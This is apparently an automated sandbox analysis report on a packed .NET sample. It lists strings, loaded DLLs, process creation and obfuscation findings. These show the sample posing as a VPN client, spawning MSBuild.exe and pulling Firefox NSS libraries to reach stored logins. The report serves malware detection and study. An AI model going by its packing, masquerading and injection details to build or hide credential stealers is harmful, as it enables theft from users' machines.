                            Source: nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                            Source: nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                            Source: nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                            Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                            Source: sqln[1].dll.1.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                            Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                            Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                            Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                            Source: sqln[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                            Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                            Source: nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                            Source: nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                            Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                            Source: sqln[1].dll.1.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                            Source: KFIEHIIIJDAAAAAAKECB.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: sqln[1].dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                            Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                            Source: sqln[1].dll.1.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                            Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                            Source: YyIDUCFWC1.exeReversingLabs: Detection: 26%
                            Source: YyIDUCFWC1.exeVirustotal: Detection: 26%
                            Source: YyIDUCFWC1.exeString found in binary or memory: --start
                            Source: YyIDUCFWC1.exeString found in binary or memory: AConnecting using command {0} {1}gThe start process did not return within the timeout7Helper app --start output:
                            Source: YyIDUCFWC1.exeString found in binary or memory: Action3http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/StopT
                            Source: YyIDUCFWC1.exeString found in binary or memory: Action3http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/StopT
                            Source: YyIDUCFWC1.exeString found in binary or memory: ReplyAction;http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/StopResponseR
                            Source: YyIDUCFWC1.exeString found in binary or memory: ReplyAction;http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/StopResponseR
                            Source: YyIDUCFWC1.exeString found in binary or memory: Download/Install
                            Source: YyIDUCFWC1.exeString found in binary or memory: U/configuration/appSettings/add[@key='{0}']
                            Source: unknownProcess created: C:\Users\user\Desktop\YyIDUCFWC1.exe "C:\Users\user\Desktop\YyIDUCFWC1.exe"
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mozglue.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvcp140.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: YyIDUCFWC1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: YyIDUCFWC1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: YyIDUCFWC1.exeStatic file information: File size 4479608 > 1048576
                            Source: YyIDUCFWC1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x431800
                            Source: YyIDUCFWC1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2111715611.000000006CF6D000.00000002.00000001.01000000.0000000B.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                            Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                            Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                            Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2110913060.000000006CC2F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                            Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: YyIDUCFWC1.exe, 00000000.00000002.1701548677.000000000449D000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000004312000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1708250819.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmp, Protect544cd51a.dll.0.dr
                            Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: YyIDUCFWC1.exe
                            Source: Binary string: C:\Users\sc-client\Jenkins\workspace\WindowsBuild\SecureConnectClient\ACVC.Core\obj\WinRelease\netstandard2.0\AWSVPNClient.Core.pdbSHA256 source: YyIDUCFWC1.exe
                            Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb\ source: YyIDUCFWC1.exe
                            Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                            Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                            Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                            Source: Binary string: C:\Users\sc-client\Jenkins\workspace\WindowsBuild\SecureConnectClient\ACVC.Core\obj\WinRelease\netstandard2.0\AWSVPNClient.Core.pdb source: YyIDUCFWC1.exe
                            Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2110913060.000000006CC2F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                            Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2105558542.0000000019808000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2099739476.0000000013898000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
                            Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2111715611.000000006CF6D000.00000002.00000001.01000000.0000000B.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                            Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                            Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: YyIDUCFWC1.exe, 00000000.00000002.1708250819.000000000577A000.00000004.08000000.00040000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000004243000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: c:\Temp\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: YyIDUCFWC1.exe

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: YyIDUCFWC1.exe, mEqmoE9UxRmX9ogcto.cs.Net Code: Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.zlLGFC8v8FsZ4(16777503)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.zlLGFC8v8FsZ4(16777307)),Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.zlLGFC8v8FsZ4(16777260))})
                            .NET source code contains potential unpacker
                            Source: YyIDUCFWC1.exe, hrwN54ssk66JhR0d65a.cs.Net Code: pkqf1sPLYHfD2WBJfKjH System.Reflection.Assembly.Load(byte[])
                            Source: YyIDUCFWC1.exeStatic PE information: 0xAC500F2F [Wed Aug 10 19:31:59 2061 UTC]
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CEEB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6CEEB6C0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF3CC2B push ecx; ret 0_2_6CF3CC3E
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF3D565 push ecx; ret 0_2_6CF3D578
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_02D54743 push ds; iretd 0_2_02D54744
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041A4E5 push ecx; ret 1_2_0041A4F8
                            Source: YyIDUCFWC1.exe, hrwN54ssk66JhR0d65a.csHigh entropy of concatenated method names: 'lLHifFIsCLsZtjvFfN0i', 'tsFkXCLB65', 'V2hk1qXaN6', 'VIcAsHPLk0x0qMOGDsUM', 'AlGEkNPLR6uMGdG1y6Fn', 'XbGKZJPLqpgb8KM4dYNO', 'TFKckiPLlTiYWYmTuprl', 'SxfBmKPLsova8eEhejPp', 'fws0jCPLoKnUFSdfYYPp', 'l99dCbPLVe4inAOWaG2i'
                            Source: YyIDUCFWC1.exe, Context.csHigh entropy of concatenated method names: 'Add', 'ContainsKey', 'Remove', 'TryGetValue', 'Add', 'Clear', 'Contains', 'CopyTo', 'Remove', 'GetEnumerator'
                            Source: YyIDUCFWC1.exe, Form1.csHigh entropy of concatenated method names: 'Dispose', 'InitializeComponent', 'kWr4EX5Gd857rgq7rv', 'Tnp50ng4OqUnov4Fxb', 'tCSbgiwQoAlj0QLZ36', 'cI0MyEaTG7OotqrxMs', 'OOC1K84P5qL9DRVtmF', 'OiNNB5hg5t7XaB8AG6', 'dxD2y4rqQoZEmsew5J'
                            Source: YyIDUCFWC1.exe, mEqmoE9UxRmX9ogcto.csHigh entropy of concatenated method names: 'Q5MkM5QYd3', 'Tipv3tPTMYJ73eGHyD8t', 'zGgUq6PTckEu7BpQjCFR', 'sQrX3QPTZiBvbHfgVOBV', 'fHSkdAnkJf', 'k96k7mkjK6', 't26kG3LxyN', 'WBQk3NCaKd', 'AgYkLp4qOr', 'UPXIAdPTAdlLUbv9SeBu'
                            Source: YyIDUCFWC1.exe, TimesheetDetailView.csHigh entropy of concatenated method names: 'nH2csNPoDkxv3xVMPkEc', 'tI5AITPozrBsvLDxmKkk', 'louZwoPVIx35aw75X1WY', 's3PYHsPVPkUkR6vqItE8', 'QfXCUmPV1Ne1wQ5C6Va5', 'mU6K5PPVtd4ryAqNpWI8', 'yauu6iPVnfvoi7tbbDpj', 'R1WkAMPV6BgQ0IlNt6MB', 'kAc54APoffcgC6emZXhR', 'Q72JRtPo3ltPjl20kZQQ'
                            Source: YyIDUCFWC1.exe, IoBoardsSet.csHigh entropy of concatenated method names: 'AddIoBoardRow', 'AddIoBoardRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewIoBoardRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, DoorsSet.csHigh entropy of concatenated method names: 'AddDoorRow', 'AddDoorRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewDoorRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, TimesheetUsersDetailView.csHigh entropy of concatenated method names: 'wmbaswPYDXyNgv38BvAQ', 'PgPDXZPYzmwP9sje52Ee', 'gwMyRuPdIWxnLajCmGSs', 'PVJy9lPdPhVqL15VO2Bp', 'v2td2SPd1rhqvYRfFdud', 'WlUSX8Pdte2ZhoINriUj', 'Q8ABT6PdnkqMxRM7oKOK', 'feW1XXPd643ep26o9DDA', 'yENk1jPdWCOeNnHyeFD9', 'AoihPKPdJDiR1rpe792v'
                            Source: YyIDUCFWC1.exe, EventsSet.csHigh entropy of concatenated method names: 'AddEventRow', 'AddEventRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewEventRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, IoBoardOutputsSet.csHigh entropy of concatenated method names: 'AddIoBoardOutputRow', 'AddIoBoardOutputRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewIoBoardOutputRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, TimesheetSummaryView.csHigh entropy of concatenated method names: 'hSqRhvP9mgWaYjvT2kDB', 'sjYSeJP9x1aOTX0lQkPX', 'cUt3XtP9vWCHiGkcUYD0', 'LVK7uyP9jQyeekgUG9bc', 'wILFROP9e1VryiymYFrO', 'V5PxZXP9fM1PfkKlVYol', 'q6KxrQP93XF02cxxaigD', 'j29Hd5P9DplPnRdCFEJ5', 'AyGNe8P9StklH3e5lMjc', 'oL01VVP9Xgkk5uaivu9v'
                            Source: YyIDUCFWC1.exe, IoBoardInputsSet.csHigh entropy of concatenated method names: 'AddIoBoardInputRow', 'AddIoBoardInputRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewIoBoardInputRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, AccessLevelDetailSet.csHigh entropy of concatenated method names: 'AddAccessLevelDetailRow', 'AddAccessLevelDetailRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewAccessLevelDetailRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, TimesheetUsersDetailSet.csHigh entropy of concatenated method names: 'AddTimesheetUsersDetailRow', 'AddTimesheetUsersDetailRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewTimesheetUsersDetailRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, TimesheetCategoriesSet.csHigh entropy of concatenated method names: 'AddTimesheetCategoryRow', 'AddTimesheetCategoryRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewTimesheetCategoryRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, TimesheetSummarySet.csHigh entropy of concatenated method names: 'AddTimesheetSummaryRow', 'AddTimesheetSummaryRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewTimesheetSummaryRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, OemClient.csHigh entropy of concatenated method names: 'Initialise', 'GetListOfOperators', 'GetOperatorLevel', 'GetOperatorLevel', 'AuthenticateUser', 'AuthenticateUser', 'AuthenticateUser', 'AuthenticateUser', 'ValidateOperator', 'CheckUserPermissionLevel'
                            Source: YyIDUCFWC1.exe, TimezonesSet.csHigh entropy of concatenated method names: 'AddTimezonesRow', 'AddTimezonesRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewTimezonesRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, CardView.csHigh entropy of concatenated method names: 'bjvf5H2abDegFgs1fxu', 'Me8Z0724J4Kn8R0QfhI', 'qyN8Uk2hHSSkwpRCVq1', 'xXW7U42rr8UNYmVWo5t', 'cinJtk2uf1OBbHj6MUk', 'qV0rv02NUaesGv8k8xr', 'RnOZbO2UGlVuxXILDX2', 'UUafni2pTG7LRa9a1q8'
                            Source: YyIDUCFWC1.exe, UsersSet.csHigh entropy of concatenated method names: 'AddUserRow', 'AddUserRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewUserRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, UserView.csHigh entropy of concatenated method names: 'qOCWirPOJ8NTP6oVysLn', 'N1lqtGPObLhnSMJaG8rG', 'QkUP2APOkj6prMtU4pXx', 'PQCc7cPORCZqCrUdpBBM', 'PD5PW2POq4LMvIxvrvBh', 'a182U5POluS17AlCURGD', 'wuoISIPOsr71qS0TwRTv', 'DaTfU5POonDkEGZltIAP', 'kOWhc0POVDKtXBXPOWxa', 'mTdN8FPOyN389U1yLthS'
                            Source: YyIDUCFWC1.exe, StaffCategoriesSet.csHigh entropy of concatenated method names: 'AddStaffCategoryRow', 'AddStaffCategoryRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewStaffCategoryRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, CardsSet.csHigh entropy of concatenated method names: 'AddCardRow', 'AddCardRow', 'GetEnumerator', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewCardRow', 'NewRowFromBuilder', 'GetRowType'
                            Source: YyIDUCFWC1.exe, CameraAuthenticationsSet.csHigh entropy of concatenated method names: 'AddCameraAuthenticationRow', 'AddCameraAuthenticationRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewCameraAuthenticationRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, DepartmentsSet.csHigh entropy of concatenated method names: 'AddDepartmentRow', 'AddDepartmentRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewDepartmentRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, OperatorSet.csHigh entropy of concatenated method names: 'AddOperatorRow', 'AddOperatorRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewOperatorRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, CardTemplateSet.csHigh entropy of concatenated method names: 'AddCardTemplatesRow', 'AddCardTemplatesRow', 'FindByCardId', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewCardTemplatesRow', 'NewRowFromBuilder', 'GetRowType'
                            Source: YyIDUCFWC1.exe, TimesheetEventLogsSet.csHigh entropy of concatenated method names: 'AddTimesheetEventLogRow', 'AddTimesheetEventLogRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewTimesheetEventLogRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, CamerasSet.csHigh entropy of concatenated method names: 'AddCameraRow', 'AddCameraRow', 'FindByID', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewCameraRow', 'NewRowFromBuilder', 'GetRowType'
                            Source: YyIDUCFWC1.exe, CardTypesSet.csHigh entropy of concatenated method names: 'AddCardTypeRow', 'AddCardTypeRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewCardTypeRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, IndividualReaderAreasSet.csHigh entropy of concatenated method names: 'AddIndividualReaderAreasRow', 'AddIndividualReaderAreasRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewIndividualReaderAreasRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, RawEvent.csHigh entropy of concatenated method names: 'AddEventRow', 'AddEventRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewEventRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, TimesheetDetailsSet.csHigh entropy of concatenated method names: 'AddTimesheetDetailRow', 'AddTimesheetDetailRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewTimesheetDetailRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
